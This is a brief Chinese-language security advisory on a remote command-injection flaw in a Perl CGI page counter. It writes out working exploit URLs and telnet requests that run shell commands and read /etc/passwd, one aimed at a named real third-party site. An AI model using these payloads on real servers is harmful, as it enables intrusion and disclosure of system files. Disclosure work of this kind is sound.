涉及程序: popular cgi web page access counter 4.0.7 描述: popular cgi web page access counter 4.0.7 允许 远程 执行 任意命令 详细: popular cgi web page access counter 4.0.7 版由于不检查用户输入,导致 允许 用户 执行 任意命令, 。用户所拥有
涉及程序:
popular cgi web page access counter 4.0.7
描述:
popular cgi web page access counter 4.0.7允许远程执行任意命令
详细:
popular cgi web page access counter 4.0.7 版由于不检查用户输入,导致允许用户执行任意命令,
。用户所拥有的执行这些命令的权限和web server是一样的.使用其它的exploits可以得到未打补丁的`系统的root权限。
这个计数器包含用perl script写成的counter,和与counter多重连接的counter-old,counterfiglet,counterfiglet-ord, counterbanner, 和 counterbanner-ord.
以下例子说明此漏洞如何可以被利用.
使用如下url
------------------
http://www.xxx.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
passing commands in a variable
------------------------------
> telnet web-server www
get /cgi-bin/counterfiglet/nc/f=;sh%20-c%20$http_x http/1.0
x: pwd;ls -la /etc;cat /etc/passwd
> telnet web-server www
get /cgi-bin/counter/nl/ord/lang=english(1);system($env); http/1.0
x: echo;id;uname -a;w
国外示范站点
http://seal.gatech.edu/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;ls
解决方案:
使用其它计数器。